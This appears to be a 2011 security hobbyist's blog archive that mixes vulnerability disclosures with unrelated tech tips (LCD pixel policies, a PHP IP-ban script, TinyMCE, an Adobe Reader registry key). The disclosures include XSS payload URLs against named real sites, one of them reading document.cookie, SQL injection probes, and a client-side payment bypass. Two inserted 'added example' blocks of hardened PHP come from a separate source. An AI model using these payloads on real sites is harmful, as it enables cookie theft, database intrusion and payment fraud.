
Posts

Showing posts from September, 2011

scam, xss, spam, free/fake registration - ilpopolodellaliberta.it

http://adesioneonline.ilpopolodellaliberta.it/include/comuni.php?comune=Ades.natoa&prov=Ades.natopr%0A%3Cscript%3Ealert%281%29%3C/script%3E%0A&id=Ades.idcomunens&stato=Ades.statonato&label=1&idprovv=Ades.idprovnascita

There are several xss - I've no time to list them all.
-----------------------------------

We can change any value on the client side; there is almost no verification on the server side.
I subscribed for 0€
-----------

During registration I chose this payment gateway:
www.monetaonline.it/

and it's so strange that this payment gateway has only client-side checks!!!


After submitting the data I got an internal server error and I got the success page
at http://adesioneonline.ilpopolodellaliberta.it/s27servertransazioneritorno.php

I've *paid* my *free* subscription to the PDL.

LCD Display Pixel Policy

APPLE - rumors refer to up to 15 anomalies (dead/bright/dark/any_strange pixel) for a support request
LCD display pixel anomalies for Apple products released before 2010
http://support.apple.com/kb/HT1721
About LCD display pixel anomalies for Apple products released in 2010 and later
http://support.apple.com/kb/HT4044

ASUS

ASUSTeK Australia and New Zealand LCD Monitor Warranty Policy
http://support.asus.com/repair.aspx?no=587&SLanguage=en
ASUS ZBD (Zero Bright Dot )
http://support.asus.com/repair.aspx?no=579&SLanguage=en

ATEN - Altusen
http://www.aten.com/data/announcement/zero-dead-pixel-policy.html

BenQ -  for FP series up to 24" (7 days)

Dell - All the monitors (15 days)
http://support.dell.com/support/topics/global.aspx/support/kcs/document?docid=414288

EIZO - 5/3/2/1 years.
global eizo - http://www.eizo.com/global/support/warranty/index.html
warranty it - http://www.eizo.it/supporto/garanzia.html
warranty au - http://eizo.com.au/support/warranty/index.php
pixel polic…

www.pdlcamera.it | SQL Injection

Sample
http://www.pdlcamera.it/ufficioStampa2010.asp?News_ID=3'

Syntax error in string in query expression 'pubblicato=true AND News_ID=3' ORDER BY Date_stamp DESC'.

http://www.pdlcamera.it/ufficioStampa2010.asp?News_ID=3 group by 1

Cannot group on fields selected with '*' (tblNews).

yeppa, we have the table ... and so on...
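
Added example, not code from the original post: the error messages above show the News_ID value landing inside the query text and the database error being echoed to the visitor. A hardened form of that lookup in PHP, with an in-memory SQLite table standing in for tblNews (the title column, the sample rows and the function names demoDb and fetchNews are assumptions):

```php
<?php
declare(strict_types=1);

// Constructed stand-in for the news table (in-memory SQLite, sample rows).
function demoDb(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE tblNews (News_ID INTEGER PRIMARY KEY, title TEXT,
               pubblicato INTEGER, Date_stamp TEXT)');
    $db->exec("INSERT INTO tblNews VALUES (3, 'Sample item', 1, '2011-09-01'),
               (4, 'Draft item', 0, '2011-09-02')");
    return $db;
}

// Returns the published rows for one id, or null when the input is rejected
// or the query fails. No database error text reaches the client.
function fetchNews(PDO $db, string $rawId): ?array
{
    // 1. Allow-list: the id must be a positive integer, nothing else.
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;
    }
    try {
        // 2. Bound parameter: the value never becomes part of the SQL text.
        $stmt = $db->prepare('SELECT News_ID, title FROM tblNews
                              WHERE pubblicato = 1 AND News_ID = :id
                              ORDER BY Date_stamp DESC');
        $stmt->bindValue(':id', $id, PDO::PARAM_INT);
        $stmt->execute();
        return $stmt->fetchAll(PDO::FETCH_ASSOC);
    } catch (PDOException $e) {
        // 3. Log server-side; the visitor only sees a generic failure.
        error_log('news query failed: ' . $e->getMessage());
        return null;
    }
}

// The two malformed values are the ones quoted in the post above.
$db = demoDb();
foreach (['3', "3'", '3 group by 1', '4'] as $input) {
    $rows = fetchNews($db, $input);
    printf("%-14s => %s\n", $input,
        $rows === null ? 'rejected' : count($rows) . ' row(s)');
}
```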

delicious.com | XSS

the XSS is quite simple
just add
http://delicious.com/save?jump=yes&v=2%3Csurox&url=http://trueliarx.blogspot.com/%22%3E%3Cimg%20src=1%20onerror=alert(document.cookie)%3E%3C%22&title=pro(re)gress






(fixed)
Spammy
http://forums.utest.com/rss.php?mode=Lorem%20ipsum%20dolor%20sit%20amet,%20consectetur%20adipiscing%20elit.%20Nunc%20sit%20amet%20elit%20turpis.%20Cras%20elementum,%20turpis%20quis%20rutrum%20viverra,%20dui%20sapien%20auctor%20lorem,%20sed%20suscipit%20dui%20odio%20eget%20ligula.%20Nunc%20a%20sem%20mauris,%20a%20porta%20tortor.%20Nunc%20in%20varius%20justo.%20Praesent%20venenatis%20ultrices%20condimentum.%20Morbi%20eget%20imperdiet%20ante.%20Praesent%20eros%20metus,%20pulvinar%20nec%20laoreet%20a,%20aliquam%20nec%20orci.%20Nunc%20cursus%20condimentum%20lacus,%20at%20dictum%20sapien%20tincidunt%20non.%20Nullam%20gravida%20condimentum%20leo,%20id%20porta%20nibh%20placerat%20sit%20amet.%20Phasellus%20sed%20elit%20vel%20quam%20ornare%20laoreet.

(They have fixed it)

ninjasaga fb game - error denial of service free rewards

Fatal error: Uncaught exception 'Exception' with message 'Unknown column 'WALLFEED_ID' in 'where clause' sql >> delete from GET_FRIEND_REWARD where WALLFEED_ID=135494 limit 1' in /home/ninjasaga/bitemycode_api/include/db/DBConnector.php:191 Stack trace: #0 /home/ninjasaga/app.ninjasaga.com/fb_oauth_2.0/friend_reward.php(692): DBConnector->query('delete from GET...', 'social') #1 /home/ninjasaga/app.ninjasaga.com/fb_en/friend_reward.php(4): require_once('/home/ninjasaga...') #2 {main} thrown in /home/ninjasaga/bitemycode_api/include/db/DBConnector.php on line 191

Php - a fast(?) and simple approach to ban ips from your website

This is a very old tiny script that I used to ban IP addresses from a PHP page/website. Bans are not a good solution in terms of website performance, especially if the ban list is long or complex to process.


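function checkbans(){
    // Open the ban list: one IP address per line.
    $handle = fopen("ipbans.dat.php", "r");
    // Note: if the list cannot be opened, nobody is banned (fails open).
    if($handle === false){ return false; }
    // Read whole lines: a 32-byte cap would split IPv6 addresses (up to 45 characters).
    while (($line = fgets($handle)) !== false) {
        // Strict string comparison against the client address.
        if( trim($line) === $_SERVER['REMOTE_ADDR'] )
        {
            fclose($handle);
            //header('Location: http://www.google.com'); //redirect to google?
            exit(); // banned client: stop serving the page
        }
    }
    fclose($handle);
}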
You can just call the checkbans() function from your PHP file.
The storage file should be outside the web root or, if you are using it with the .php extension, add
<?php exit(); ?> as the first line.


This is not a solution to recommend, but I found it in my old crappy code (more than five years ago).

I actually use a mix…
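
Added example, not code from the original post: the same ban check extended to CIDR ranges and IPv6, with the list parsed once into packed form so each request only does byte comparisons. The function names loadBans and isBanned, the '#' comment convention and the sample addresses (documentation ranges) are assumptions.

```php
<?php
// Parse ban-list lines into [packed network, prefix bits] pairs (one address or
// CIDR range per line); blanks, '#' comments and the PHP guard line are skipped.
function loadBans(array $lines): array
{
    $bans = [];
    foreach ($lines as $line) {
        $line = trim($line);
        if ($line === '' || $line[0] === '#' || $line[0] === '<') {
            continue;
        }
        [$addr, $prefix] = array_pad(explode('/', $line, 2), 2, null);
        $net = @inet_pton($addr);
        if ($net === false || ($prefix !== null && !ctype_digit($prefix))) {
            continue; // malformed entry: ignore it
        }
        $max  = strlen($net) * 8; // 32 for IPv4, 128 for IPv6
        $bits = $prefix === null ? $max : (int) $prefix;
        if ($bits <= $max) {
            $bans[] = [$net, $bits];
        }
    }
    return $bans;
}

// True when $ip equals a banned address or falls inside a banned range.
function isBanned(string $ip, array $bans): bool
{
    $bin = @inet_pton($ip);
    if ($bin === false) {
        return false; // not a parsable address
    }
    foreach ($bans as [$net, $bits]) {
        if (strlen($net) !== strlen($bin)) {
            continue; // IPv4 entries never match IPv6 clients and vice versa
        }
        $full = intdiv($bits, 8);                 // whole bytes to compare
        $mask = (0xFF << (8 - $bits % 8)) & 0xFF; // leftover bits (0 if none)
        if (strncmp($bin, $net, $full) === 0
            && ($mask === 0 || ((ord($bin[$full]) ^ ord($net[$full])) & $mask) === 0)) {
            return true;
        }
    }
    return false;
}

// Constructed sample data (documentation address ranges).
$bans = loadBans(['<?php exit(); ?>', '192.0.2.0/24', '203.0.113.7', '2001:db8::/32']);
foreach (['192.0.2.55', '203.0.113.8', '2001:db8::1', '198.51.100.1'] as $ip) {
    echo $ip, ' => ', isBanned($ip, $bans) ? 'banned' : 'allowed', "\n";
}
```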

TinyMCE not starting

While (ab)using TinyMCE, all of a sudden it stopped working and there was no error/notice in the JS error console. I tried several things without success, and after 20 minutes I thought to start "Tamper Data" in Firefox to check what was wrong. The problem was quite simple ... a plugin was completely missing (404 page). If TinyMCE doesn't start, check the error console, missing files, and a missing div/textarea with the relevant ID.

Adobe Reader X - Eula problem (again)

Acrobat Reader X is quite boring, with useless problems that annoy a lot of users. This time I got this message while opening PDF files downloaded via the browser: "Before proceeding you must first launch Adobe Acrobat and accept the End User License Agreement". The previous solution (run Adobe Reader without any PDF file and accept the EULA) didn't work. The only method that has worked for me is to add the following registry key to accept the EULA for the browsers.

--copy the following text in a .reg file and run--

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Adobe\Adobe Acrobat\10.0\AdobeViewer]
"EULAAcceptedForBrowser"=dword:00000001